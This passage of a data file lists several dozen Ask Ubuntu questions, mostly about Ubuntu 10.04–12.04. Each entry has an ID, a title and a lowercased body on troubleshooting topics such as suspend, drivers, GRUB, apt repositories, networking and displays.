ou=sudoers , dc=a , dc=b , dc=c sudoers_debug 2 pam_lookup_policy yes pam_check_host_attr yes pam_lookup_policy yes pam_check_host_attr yes tls_cacert /etc/ssl/certs/ca-certificates.crt tls_reqcert never
144591	suspend and hibernate does not working ubuntu 10.10	i 've been using linux for five years . a week ago , installed ubuntu 10.10 ( 2.6.35-22-generic ) , after the update found that the mode of suspend and hibernate do not work now , still looking for a solution to this problem . here is the configuration of your computer : cpu - intel core i3 , 4gb , motherboard-gigabyte h55n-usb3 , keyboard and mouse - logitech k260 , monitor - dell u2412m . if you know the source or you have information regarding this problem , please help . do not offer me a ubuntu 11.04/11.10/12.04 lts , i 'm not going to move to another distro because of simple problems , i am sure that is possible to fix the problem . just offer me your options , and then i will review them . thank you !
144605	any way to skip the huge apt-cache-update everytime a repository is added ?	i keep adding atleast one repository per day. ! i like new stuff and to personalise my ubuntu . but now evertime i add a repository , the apt cache needs to be updated and its almost a 10-15min update everyday. ! moreover its a lot data consuming . is there any way or workaround so that the repository is updated in the apt-cache without updating other stuff ? also , sometimes i do not wish to install some updates at the given point of time due to my bandwidth limitations.but then if i have to add a repository , the updates are all installed in the sudo apt-get update command.. would like any help . the bandwidth limit is actually a major issue for me. ! thanx : )
144608	why is the google ppa reenabled after an upgrade to a new release ?	ppa 's are normally disabled when you upgrade , and must be re-enabled manually . i upgraded to 12.04 about a month ago and i just noticed that while my other ppas had all been disabled , the google ppas were not disabled . why is this ?
144609	pulseaudio does not start after logout and login again	i am using ubuntu 12.04 . when i logout and login again pulseaudio does not start and i have to start pulseaudio manually . when i boot my computer and login , pulseaudio is starting as expected . this happens only if i logout and login again .
144610	ubuntu 12.04 lts window is a dull color	when you open up google chrome in ms windows the white background is a brilliant white , but in ubuntu its a dull white color . why is this and is it normal ? is there a way to adjust the change this to have the same if not similar defined characteristics as windows ?
144612	battery charging is flickering	a few days ago my notebook started to bug around with charging the battery . when the battery is not absent notebook runs smoothly . until i plug in the battery . then it starts to charge but immediately stops and restarts charging and stops and so on . if the notebook is not running battery seems to charge well ( led is not blinking ) . and led is not blinking intermittently . seems to be arbitrary . does it have something to do with that ? this happens every second . [ 13354.078696 ] keyboard : ca n't emulate rawmode for keycode 240
144613	how to make external monitor primary ( xubuntu )	i am using xubuntu 12.04 and i want to use my 24 '' monitor as a secondary display . ok ! first try : going to the settings manager -- > display and searched for the secondary display to enable it . but there is no secondary display entry . okay..no luck . second try : starting the nvidia-settings manager and try to configure the displays here . this way it works , but i am not able to make the external screen primary . the funny thing is : i can only make the external monitor primary if it is configured to be positioned at the left side of the notebook display : p but i need it the other way around . ( notebook display left , external ( primary ) monitor right ) if i configure it that way the top panel is automatically placed on the notebook display . third try : disper : my last trywas to use disper to configure my display layout . but the same problem appears . i used the command : disper -d dfp-1 , dfp-0 -t left but the panel again stays on the wrong screen . if i use disper -d dfp-1 , dfp-0 -t right it works ...
144614	upgrade from 11.10 to 12.04 leaves me in cli	i 'm currently running my ubuntu box on vmware . as a relative newcomer to ubuntu i had no idea that there was no roll-back feature so when update centre kept nagging me about updating i thought ok. should have know better . after the upgrade i 'm left with no gui and the cli with a message telling me that `` the system is running in low-graphics mode '' . help . i 've just rebooted again and now it 's even worse : - screen shot of console
144617	graphics mode on install	i 'm trying to install ubuntu 12.04 or any version from a thumb drive onto an hp t5565 thin client . the install crashes when it trys to init graphics . i 've installed linux mint 13 by using safe mode but can not understand how to get ubuntu to install into low graphics .
144621	how do i stop the screensaver from turning on when watching videos online ?	my screenlock is set to five minutes . so while playing youtube videos after five minutes the screen locks even though the video is playing . any solutions ?
144623	compiz configuration/settings are not working	i 've made some changes to my compiz with compizconfig settings manager , like enable the cubic desktop and changing the unity icons size . today when i started my laptop , they all where gone back to default and i ca n't even change it back . i mean when i change them in compizconfig , they are not changed in reality , no effects . i 've restarted once , and no effect . also updated and upgraded packages . compiz -- replace and unity -- reset did n't work . and yesterday i installed cheese and gparted . maybe it was because of that . and this is the first time in my life i 'm seeing this . my question is very similar to this . had a look at the bugs in compiz launchpad , did n't find anything matching . some info about my laptop : alfred @ alfitop : ~ $ uname -a linux alfitop 3.2.0-24-generic # 39-ubuntu smp mon may 21 16:52:17 utc 2012 x86_64 x86_64 x86_64 gnu/linux alfred @ alfitop : ~ $ compiz -- version compiz 0.9.7.8 alfred @ alfitop : ~ $ unity -- version unity 5.12.0 alfred @ alfitop : ~ $ xorg -version x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.24-31-server x86_64 ubuntu current operating system : linux alfitop 3.2.0-24-generic # 39-ubuntu smp mon may 21 16:52:17 utc 2012 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.2.0-24-generic root=uuid=404922f4-7e8b-42a4-b009-a03aabb8aa24 ro quiet splash vt.handoff=7 build date : 07 may 2012 11:43:21pm xorg-server 2:1.11.4-0ubuntu10.2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . alfred @ alfitop : ~ $ lspci -nnk | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 12 ) alfred @ alfitop : ~ $ sudo lshw -c video *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 12 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:41 memory : f0000000-f03fffff memory : d0000000-dfffffff ioport:1800 ( size=8 ) ( i was n't sure what to put , if you think any of the info is unnecessary , feel free to edit and remove that part and save other 's time : d )
144632	how do i know the command to check if an application is installed on my computer or not ?	i had recently installed a version of vmware workstation that i had to uninstall and to look for instructions about doing so i came across this thread . it stated writing this command to see if there was any version of vmware workstation installed : vmware-installer -l so what i want to know is , just like the quoted command for vmware , how do i know about other commands that exist to let me know if a particular product is installed on my computer or not ? thanks for looking in .
144633	how to solve `` failed to fetch gzip : /var/lib/apt/lists/partial/package '' ?	whenever i try to update my computer using the update manager or sudo apt-get update on a terminal i get this : failed to download the information from the repository check your internet connection details : `w : failed to fetch gzip : /var/lib/apt/lists/partial/ar.archive.ubuntu.com_ubuntu_dists_oneiric_univeârse_i18n_translation-en` encountered a section with no package : header , e : some index files failed to download . they have been ignored , or old ones used instead . but my internet connection works fine . the banish404 software does n't work . here is my /etc/apt/sources.list file . what do i have to do ?
144634	why are many operations or commands in ubuntu not allowed normally when you can just do the same thing by typing sudo ?	what purpose does this server when bypassing is as easy as typing sudo ? forgive the naivety here but i am a rookie and i 'm sure there has to be a good reason for this , and i 'd like to know that .
144636	why do none of my local servers resolve	when i try to ping or browse using a web browser certain domains names that we host on our local network , it does not work . yet dig , nslookup correctly return their details . what do i need to do to fix this . the dns server and dhcp server at our local network work fine on the windows clients . $ ping ns1.domain.local ping : unknown host ns1.domain.local aaron @ aaron-laptop : ~ $ nslookup ns1.domain.local server : 127.0.0.1 address : 127.0.0.1 # 53 name : ns1.domain.local address : 172.16.0.254 $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search domain.local $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ipv4 settings : address : 172.16.0.93 prefix : 24 ( 255.255.255.0 ) gateway : 172.16.0.2 dns : 172.16.0.254 added additional info as per http : //askubuntu.com/a/146310/10998 for some reason avahi-daemon interferes with name resolver ping ns1 ping ns1.domain.local ( 172.16.0.254 ) 56 ( 84 ) bytes of data . 64 bytes from ns1.domain.local ( 172.16.0.254 ) : icmp_req=1 ttl=64 time=0.381 ms
144642	how to theme up kde ?	i just installed kde and i like it very much and have themed it up abit . like all that lightblue design , but how do i change the theme for gnome applications like nautilus or marlin ? and also how do i change the gray color of kmess and chromium and many other apps ? i installed kde with this command sudo apt-get install kde-full
144643	unicode problem in excel 2007	right now i 've downloaded an excel project with .csv format , but when i open it [ excel under wine ] , texts are not normal , it 's a screenshot of texts : i think it 's unicode problem , how can i fix it ? any help would be great . regards .
144645	install package via yum found on apt-cache but not yum search	i have this library on machine x that manages packages via apt : libmemcached-dev - development files for libmemcached and i want it on machine y that uses yum . yum search libmemcached-dev fails . what 's the safest way to go through with this installation ? x is ubuntu y is cent-os .
144648	grub does n't show both ubuntu installations	i have a laptop with ubuntu 12.04 lts installed as the main os . the other day i installed ubuntu-studio ( version 12.04 ) into another partition on the machine . the installation went great and when the machine booted , the grub menu popped up and i could see the option for ubuntu studio and the vanilla ubuntu os ' . the problem was that this version of grub , installed by the studio installer , did n't look great and insisted on putting studio at the top of the list , and therefore as the main os to boot . i use the standard ubuntu more often , so i booted into that and ran sudo grub-install dev/sda . that worked ok and now ubuntu boots as normal . only problem is that the grub menu does n't show up and does n't give me a chance to choose the other os . running sudo os-prober shows that it can find ubuntu studio , it does n't give me a chance to boot it . any ideas as to how i can fix this problem ? cheers in advance . edit : followed instructions here and saw the boot menu , but the only boot options present were for the standard installation of ubuntu .
144651	thinkpad t520 : is the displayport only working when using the nvidia gpu ?	maybe slightly off-topic : can anyone confirm that the displayport is hard-wired to the nvidia gpu ? that was n't the case with the predecessor thinkpad t510 , where i could use the port with the integrated intel gpu . i 'm on the integrated gpu and xrandr only reports vga1 and lvds1 . : - (
144654	ubuntu scrollbars do n't render on cygwin x server	i have an ubuntu 12.0.4 desktop . i have a win7 laptop running cygwin . i can display windows from the ubuntu box on the win7 laptop using the cygwin x server , but the window is somewhat `` degraded '' . specifically , scrollbars are not rendering properly . i 've used ubuntu before , but this is the first time i 've seen these odd scrollbar popups that are used in 12.04 . i 'm guessing the cygwin x server is having trouble rendering that for some reason . in the cygwin view , i see the slightly thicker vertical bar , but when i hover the mouse over it , nothing happens . i 'd really prefer to get conventional scrollbars . can i configure ubuntu 12.0.4 to do this , which might result in cygwin being able to display them ?
144655	how to check bluetooth status via terminal	i am looking for a way to check to see if the bluetooth is enabled or disabled on my laptop via the terminal . is there a command that i can use to find this information
144658	acer 5749 laptop is overheating	i have an acer 5749 laptop with core i3 cpu . i have migrated to ubuntu 12.04 and am experiencing a serious problem : my laptop gets really hot when i use ubuntu . i did n't have this problem with windows 7 on the same laptop . i really need your help . thanks a lot !
144660	ca n't connect to samsung gt-b2710 via usb	when i connect my phone with memory card in it with usb cable to my ubuntu notebook dbus error org.gtk.private.remotevolumemonitor.notfound : the given volume was not found error message is shown and following is written to the syslog : may 31 18:29:42 edbwp400322 kernel : [ 184240.427259 ] usb 2-1.1 : new high-speed usb device number 6 using ehci_hcd may 31 18:29:42 edbwp400322 kernel : [ 184240.524759 ] scsi10 : usb-storage 2-1.1:1.0 may 31 18:29:42 edbwp400322 mtp-probe : checking bus 2 , device 6 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1 '' may 31 18:29:42 edbwp400322 mtp-probe : bus : 2 , device : 6 was not an mtp device may 31 18:29:43 edbwp400322 kernel : [ 184241.522802 ] scsi 10:0:0:0 : direct-access samsung gt-b2710-card 2.31 pq : 0 ansi : 2 may 31 18:29:43 edbwp400322 kernel : [ 184241.524147 ] sd 10:0:0:0 : attached scsi generic sg2 type 0 may 31 18:29:43 edbwp400322 kernel : [ 184241.525184 ] sd 10:0:0:0 : [ sdb ] 3911680 512-byte logical blocks : ( 2.00 gb/1.86 gib ) may 31 18:29:43 edbwp400322 kernel : [ 184241.526410 ] sd 10:0:0:0 : [ sdb ] write protect is off may 31 18:29:43 edbwp400322 kernel : [ 184241.526413 ] sd 10:0:0:0 : [ sdb ] mode sense : 0f 0e 00 00 may 31 18:29:43 edbwp400322 kernel : [ 184241.527125 ] sd 10:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua may 31 18:29:43 edbwp400322 kernel : [ 184241.536461 ] sdb : sdb1 may 31 18:29:43 edbwp400322 kernel : [ 184241.541653 ] sd 10:0:0:0 : [ sdb ] attached scsi removable disk may 31 18:29:44 edbwp400322 usb_modeswitch : switching device 04e8 : f000 on 002/006 may 31 18:29:44 edbwp400322 kernel : [ 184242.332659 ] sd 10:0:0:0 : [ sdb ] synchronizing scsi cache is there any chance to access phone 's memory card as memory stick ? best regards , eugene .
144665	will gimp 2.8 be available in the ubuntu 12.04 software centre ?	ubuntu 12.04 lts was released 2012-04-26 . gimp 2.8 was released 2012-05-03 . ( a week later ) i ca n't find this new version in the ubuntu software centre . when can we expect it there ?
144667	having set up a dchp server , what do i need to do for the rest of my network ?	i 've got a raspberry pi arriving any day now , and i intend to use it ( amongst other things ) as a dhcp server . currently we have a few devices on our network to which we would like to assign static ips , and a router , which is currently the dhcp server ( the router can assign static ips , but is buggy as hell , i 've never got the config to stick for more than a few hours ) . having connected the pi to the network and configured dhcpl-3-server , what do i need to do on the rest of my network so that it works properly ( clients get their ips from the pi , and use the router as the default gateway ) ?
144668	find out if there is a local user logged in when logging in over ssh	i need to run some calculations on a machine that i can only access remotely but also serves as a work station . there are many of them and i want to pick a `` free '' one . free means in this case that no one is logged in locally . my first try was the who command , but for some reason it only lists `` selected '' users and i ca n't really find out how they are selected . next try : ps aux | cut -d `` `` -f1 | sort | uniq : better showing a bunch of demons but also the local user that was not displayed by who . my current solution is to go in and do ps aux | grep `` gnome-session '' which is better but still gives me a lot of junk . ideally i am looking for something that i can include in my ssh profile that warns me about ( active ) local users when i log in . edit : neither who nor w did return the local user . is this an unexpected behaviour ? uptime on the other hand showed me the right amount of users ( local and remote minus system users like root ) finger is not installed
144672	resolution problem with nvidia craphic card gt540m	i upgraded ubuntu to 12.04 , i have lenovo ideapad with gt540m 2gb graphic card , 2nd gen i5 processor . when i installed nvidia drivers , screen resolution changed to 640x480 , can nvidia drivers be installed , coz i have tried many ways and took help of almost all discussions on this site . is this problem of optimus or anything else . please help me out .
144673	how can i upgrade to ubuntu 12.04 from clean install of 9.10 ?	my system crashed , after reinstalling nvidia drivers ( with maverick meercat . ) -could not resolve problem , and have done a clean installation of ubuntu 9.10 . now i would like to upgrade to 12.04 . i had so many problems with unity desktop , following installation of natty narwhal that i gave up , and chose to upgrade to maverick meercat ( 10.10 . ) how should i proceed ?
144678	ubuntu 12.04 boot only when usb drive is connected	i freshly installed `` ubuntu 12.04 '' on my dell lattitude d830 . while i am able to work on it , there is a starange problem while booting my laptop . it does n't boot unless the usb drive which was used to install it is connected . it looks like the os is installed on hard drive , but the boot record is in usb . however , i am not sure on this . i am not able to figure out the problem and need your help in this regard .
144679	ubuntu server iso for vmware player	where can i find an ubuntu server iso to use ( convert to a vm ) in vmware player ?
144690	can not make ubuntu 64-bit v12.04 install work	i decided it was time to update my ubuntu ( single boot ) computer from 64-bit v10.04 to 64-bit v12.04 . unfortunately , for some reason ( or reasons ) i just ca n't make it work . note that i am attempting a fresh install of 64-bit v12.04 onto a new 3tb hard disk , not an upgrade of the 1tb hard disk that contains my working 64-bit v10.04 installation . to perform the attempted install of v12.04 i unplug the sata cable from the 1tb drive and plug it into the 3tb drive ( to avoid risking damage to my working v10.04 installation ) . i downloaded the ubuntu 64-bit v12.04 install dvd iso file ( ~1.6 gb ) from the ubuntu releases webpage and burned it onto a dvd . i have downloaded the dvd iso file 3 times and burned 3 of these installation dvds ( twice with v10.04 and once with my winxp64 system ) , but none of them work . i run the `` check disk '' on the dvds at the beginning of the installation process to assure the dvd is valid . when installation completes and the system boots the 3tb drive , it reports `` unknown filesystem '' . after installation on the 250gb drives , the system boots up fine . during every install i plug the same sata cable ( sda ) into only one disk drive ( the 3tb or one of the 250gb drives ) and leave the other disk drives unconnected ( for simplicity ) . it is my understanding that 64-bit ubuntu ( and 64-bit linux in general ) has no problem with 3tb disk drives . in the bios i have tried having efi set to `` enabled '' and `` auto '' with no apparent difference ( no success ) . i never bothered setting the bios to `` non-efi '' . i have tried partitioning the drive in a few ways to see if that makes a difference , but so far it has not mattered . typically i manually create partitions something like this : 8gb /boot ext4 8gb swap 3tb / ext4 but i 've also tried the following , just in case it matters : 8gb boot efi 8gb swap 8gb /boot ext4 3tb / ext4 note : in the partition dialog i specify bootup on the same drive i am partitioning and installing ubuntu v12.04 onto . it is a very dangerous fact that the default for this always comes up with the wrong drive ( some other drive , generally the external drive ) . unless i 'm stupid or misunderstanding something , this is very wrong and very dangerous default behavior . note : if i connect the sata cable to the 1tb drive that has been my ubuntu 64-bit v10.04 system drive for the past 2 years , it boots up and runs fine . i guess there must be a log file somewhere , and maybe it gives some hints as to what the problem is . i should be able to boot off the 1tb drive with the 3tb drive connected as a secondary ( non-boot ) drive and get the log file , assuming there is one and someone tells me the name ( and where to find it if the name is very generic ) . after installation on the 3tb drive completes and the system reboots , the following prints out on a black screen : loading operating system ... boot from cd/dvd : boot from cd/dvd : error : unknown filesystem grub rescue > note : i have two dvd burners in the system , hence the duplicate line above . note : i install and boot 64-bit ubuntu v12.04 on both of my 250gb in this same system , but still can not make the 3tb drive boot . sigh . any ideas ? ========== motherboard == gigabyte 990fxa-ud7 cpu == amd fx-8150 8-core bulldozer @ 3.6 ghz ram == 8gb of ddr3 in 2 sticks ( matched pair ) hdd == seagate 3tb sata3 @ 7200 rpm ( new install 64-bit v12.04 fails ) hdd == seagate 1tb sata3 @ 7200 rpm ( 64-bit v10.04 works for two years ) hdd == seagate 250gb sata2 @ 7200 rpm ( new install 64-bit v12.04 works ) hdd == seagate 250gb sata2 @ 7200 rpm ( new install 64-bit v12.04 works ) gpu == nvidia gtx-285 ? ? ? == no overclocking or other funky business usb == external seagate 2tb hdd for making backups dvd == one bluray burner ( sata ) dvd == one dvd burner ( sata ) 64-bit ubuntu v10.04 has booted and run fine on the seagate 1tb drive for 2 years .
144691	hp pavilion g6 1190sm laptop has overheat/hibernation/graphics issues	every time i reboot or shutdown my laptop , while the laptop is booting again i get a screen ( before loading the os ) that hp discovered overheating and system went into hibernation . but the point is that the laptop is not overheating nor going into hibernation by itself . also , because of the hybrid graphics card i can not install additional drivers . desktop resolution and all works perfectly but i can not use unity 3d . also , opengl does n't work as it should ( with cairo dock ) . as i 've read some posts , people say that vgaswitcheroo does n't work on 12.04 so i have n't tried it .
144692	how i can install broadcom 4311 wireless ?	no puedo conectarme a travăšs de wifi de mi hp . creo que ubuntu no reconoce la tarjeta broadcom 4311 translation via google translate i ca n't connect via wi-fi on my hp . i think ubuntu does n't recognize the broadcom 4311
144693	are there any tutorials for linux-based audio production ?	i have been searching for a while for linux based audio production tutorials . all i can find are tool based tutorials . for example i found tutorials on how to use jack , ardour , lmms ..etc . what i need are tutorials that teach professional audio production with opensource/free tools , like those already available for protools and the like . if any one can guide me to any videos/articles available it would be highly appreciated . thanks .
144698	find a file using the terminal	i am trying to find a directory , using the terminal and i am not sure where it is . i mean that i used the wget command to obtain the file and used it for installation and now i am not able to find where i kept it . i did try , find . -type f -name `` postgis-2.0.0 '' also locate postgis-2.0.0 but with no luck . what is the command to find a directory in your desktop ?
144707	pen cursor in xournal	i use xournal to give lectures and do various other tasks . so far it 's taken a little adjustment to write using my wacom tablet but it works fantastically . my only complaint is the cursor . xournal appears to override the system defined cursor with a dot cursor . the dot cursor is too small for me to reliably see . is there a way to adjust the size of the cursor or even give it a different icon ? i 've checked the user manual http : //xournal.sourceforge.net/manual.html my system : ubuntu studio 12.04 xfce desktop xournal : 0.4.6~pre20110721-1build1
144708	how to delete old kernels without package management ?	is it a good idea to remove the vmlinuz , system.map , initrd.img , config and abi files from old kernels in /boot manually ? they 're not listed in dpkg , because i installed precise pangolin without removing lucid lynx before .
144709	external monitor blacked out in xubuntu 12.04	i have a fresh install of xubuntu 12.04 on a dell latitude d610 with an external aoc monitor connected . when i go into settings- > display the external monitor is seemingly identified , but it remains black . turning off the laptop monitor ( in settings- > display ) gets me two black screens . does anyone know if there 's a problem with this setup ? some other way to configure it in xubuntu ? ideally i 'd be able to like to use both monitors , but i 'd also be happy to be able to get the external monitor working instead of the laptop 's screen . the latitude has an ati rv370 ( mobility radeon x300 ) .
144710	package update in ubuntu on vitual box	while following one of the tutorials i needed to install a curl package . here are my system configuration : virtualbox 4.1 on windows 7 64 bit . i have installed ubuntu 12.04 on the virtual box . when i try the following : sudo apt-get install curl i see the following errors : [ sudo ] password for userme : reading package lists ... done building dependency tree reading state information ... done package curl is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'curl ' has no installation candidate userme @ userme-ubuntu : ~ $ when i try the same on a direct installation of ubuntu on a laptop ( not a virtual machine ) there is no problem . i am assuming this may be because of network settings . please note that my work pc is in a corporate network and uses auto proxy settings ( using a .pac file ) for internet access etc . any help will be appreciated .
144719	how do i get ctrl-left / ctrl-right to jump a word again in byobu ?	on my ubuntu 11.10 machines running byobu 4.37 i can use the key combination ctrl-left / ctrl-right to jump a word at a time in the terminal . however , on my ubuntu 12.04 machines with byobu 5.17 , this no longer works . i 've read that byobu has remapped those key combinations to resize splits , and now alt-left and alt-right have the desired effect . however , i 'm unable to find where alt-left and alt-right are mapped , in order to remap ctrl-left and ctrl-right . if i unmap the keybindings for ctrl-left and ctrl-right , then the cursor moves only 1 character at a time , not 1 word at a time .
144721	adobe reader x64 missing dependencies	i get the error after executing acroread : acroread : error while loading shared libraries : libxml2.so.2 : can not open shared object file : no such file or directory
144732	ubuntu lags on alienware m15x	i have an alienware m15x with the following specs intel core i7 920m ati 5870m 500gb hd 4gb ram i 've been running ubuntu for a while on my work computer with an second generation i3 , 8gb ram and a 500gb hd and without a video card without problems for months now . but on my laptop it lags alot . i installed the ati drivers from the website . but when i look in my system details it says : graphics : vesa : broadway should n't it show my 5870m ?
144737	unable to install driver for nvidia gt540m on 10.04	i 'm trying to install ubuntu 10.04 on my dell xps15 l502x notebook , but i ca n't find a solution about how to install the nvidia driver . could someone help me please ? spec graphics graphics type -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- switchable integrated graphics chipset -- -- -- -- -- -- -- -- -- intel integrated graphics chipset model number -- -- - hd core i5 discreet graphics chipset -- -- -- -- -- -- -- -- -- -- nvidia geforce discreet graphics chipset model number -- -- -- - gt 525m graphics memory -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 1024 mb
144740	wireless card - can not connect to internet	after wasting endless hours of searching the internet , viewing ridiculous `` solved '' videos , and reading a gazillion posts ... unable to connect to any version of ubuntu with my laptop : 1 ) dell studio 1550 laptop : dell wireless 1397 wireless mini-card 2 ) broadcom software driver # 4.170.77.3 , dated 3-21-2008
144742	jdbc 4.0 in ubuntu 12.04	i 'm developing an application using java and mysql . i 've installed libmysql-java package as a database connector , but the installed connector implements version 3.0 of the jdbc specification . does anybody know which packages or connectors are needed to install for using jdbc 4.0 in ubuntu 12.04 using mysql . i 'm using java ( java version `` 1.7.0_04 '' ) mysql ( mysql ver 14.14 distrib 5.5.22 )
144743	ubuntu server 12.04 : `` waiting for network configuration '' and network down	i 've seen a few post similar to this , but i still have the network unreachable . how do i bring up my wireless network at boot ? `` waiting for network configuration '' adding 3 to 5 minutes to boot time i ca n't reinstall because i have mysql databases in the system . i do n't know what any other thing i can do . thanks . /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto wlan0 iface wlan0 inet dhcp wpa-ssid xxxxxxx wpa-psk xxxxxxxx
144745	unable to install icaclient ( `` errors were encountered while processing '' )	i tried to installed icaclient ( a remote desktop application ) , and it failed to install for some reason . the problem is that now whenever i try to install a new application with apt-get , i get this message even of the installation succeeded : errors were encountered while processing : icaclient : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) although applications do get installed correctly , but the message is really annoying , and it could potentially hide other errors .
144747	automounting partitions on 1tb external hard disk	i am on kubuntu 12.04 . i have five labelled ext4 partitions on an external removable 1 tb external usb hard drive . when the drive is plugged in , a box pops up , asking me what i want to do for each partition . if i elect to use the dolphin file manager , it mounts the relevant partition on /media/label where label is the label of that partition . interestingly , the directories on /media disappear after the external drive is ejected . to enable automated backups , i want to find out if the mounting can be done automatically without having to click on the popup box to select the dolphin file manager ? essentially , i wish to : automount each partition on usb plugin on /media/label as before where the directories under /media are created automatically on the fly ; and on ejection , automatically unmount partitions and remove the directories under /media . thanks .
144754	how do i transfer an eclipse project from windows to ubuntu ?	this might seem like a repetitive question , and on googling i found a bunch of similar questions asked but seriously , nothing has helped . i have no idea why the projects do n't work as it is when they 're imported and how to fix them . i keep getting these errors saying xxx ca n't be resolved . screenshots below . can anyone please help ? i have only just started using ubuntu .
144766	where does blender install on ubuntu ?	i 'm trying to put some export scripts into blender but i simply can not find the installation path ! i 'm using the latest versions of both ubuntu and blender , which i have installed with apt-get install .
144768	how do i get an acer aspire one d270 working ?	i was planning to buy acer aspire one d270 within a few days and as everybody installs linux on their netbook i was also planning to do that . now , my question is how is acer 's hardware compatibility with linux and specifically in respect to the new acer aspire one d270 . has anybody tried installing linux on these new netbooks . it will be a great help if a d270 user can share his/her experience with linux usage . i read on some forums that there is some linux driver issue with intel gma 3600 and that people are not able to adjust their brightness . so , as i am a linux noob is this a major issue or not . specs : ram : 2gb ddr3 processor : intel n2600 ( cedar trail ) graphics : intel gma 3600 harddisk : 320gb 5400 rpm
144769	ubuntu slows down even after cpu-intensive process is ended	after a skype video call , or the use of virtualbox , ubuntu slows down to a crawl , even after the process is ended . running htop reveals that processes that used little cpu before are now all using about 30 % cpu ( namely compiz , firefox , python , and skype , but i 'm sure there are others ) , to the point where all my cores are at 99 % . all i can do from here is restart . any idea why this is happpening ? i 'm running ubuntu 12.04 64-bit on 3.7 gib of memory , intel® core™ i3 cpu m 330 @ 2.13ghz × 4 , vesa : m92 graphics driver . not sure why i 'm running vesa , i installed fglrx , but i suppose that 's a different question . thanks in advance ! update so i ran across this again after playing a youtube video and backing up at the same time . i decided to run unity -- replace i received the following error : ( compiz:23601 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed initializing unityshell options ... done compiz ( core ) - warn : unhandled configurenotify on 0xc0009e ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a1 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a4 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a7 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000aa ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000ad ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000ad ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000b0 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . ( compiz:23601 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed so i ran unity -- reset and looked into htop . it seems that a `` compiz -- replace '' , firefox , skype , htop , xorg , and rythmbox were using an abnormal amount of cpu , and everything was rather laggy . top displays the following : top - 23:44:08 up 8:30 , 2 users , load average : 1.42 , 2.15 , 3.15 tasks : 205 total , 1 running , 201 sleeping , 0 stopped , 3 zombie cpu ( s ) : 29.7 % us , 13.4 % sy , 0.0 % ni , 56.3 % id , 0.2 % wa , 0.0 % hi , 0.4 % si , 0.0 % st mem : 3909324k total , 3713056k used , 196268k free , 78096k buffers swap : 4049916k total , 120360k used , 3929556k free , 2063860k cached that amount of free memory concerns me .
144770	which , among the humble indie bundle v games , work on 10.04 ?	inevitably , i 've coughed up for the latest humble bundle , containing 5 games : amnesia , bastion , limbo , psychonauts and superbrothers : sword and sorcery . at the download page it says download for ubuntu but after that it transpired ( after much head scratching ) that the three games it lists `` are not available for your version of ubuntu '' . the other two , bastion and psychonauts `` will appear on the page soon '' , but until then does anybody think they might work ? i do n't want to to be disappointed after downloading a 4gb file , causing me to reminisce on childhood memories of loading 8-bit tape games for 45 minutes only to find out that you had to reload them once you died after 30 seconds in .
144774	typing in hebrew with lubuntu	i 'm at a loss as to how to make the hebrew keyboard layout/input work . the following methods do not work : '' download hebrew language support . you can do this from the install/remove languages section of `` language support '' . system settings - > keyboard layout - > `` + '' - > `` hebrew '' - > add system settings - > keyboard layout - > options - > keys to change layout - > mark [ alt ] + [ shift ] ( this step is optional , only if you want that custom keyboard shortcut ) and setxkbmap -option grp : switch , grp : alt_shift_toggle , grp_led : scroll us , he the second option ( the code ) works for arabic , but not for hebrew . if i try to set it to hebrew , i get the following error message : `` error loading new keyboard description '' is the shorthand for hebrew not `` he '' ? ? if so , how can i find out what it is ? the first option seems simple , but the available keyboard layouts are unavailable , and the add button ca n't be pushed . i know that the instructions are for ubuntu , but lubuntu has a similar enough setup . ( yes , i 've already installed the hebrew language pack ) . alt+shift+l does n't switch to anything . ( ibus does n't even show on the system tray , even when clicked to do so ) . how can i solve this ? questions ? comments ? criticisms ?
144777	can i use the -amd64.iso cds to install on an intel 64-bit computer ?	i have a 64 bit intel system , but the only iso image i can see to download is the `` ubuntu-12.04-server-amd64.iso '' image . is this only for amd processors or can i use it on my 64 bit intel as well ?
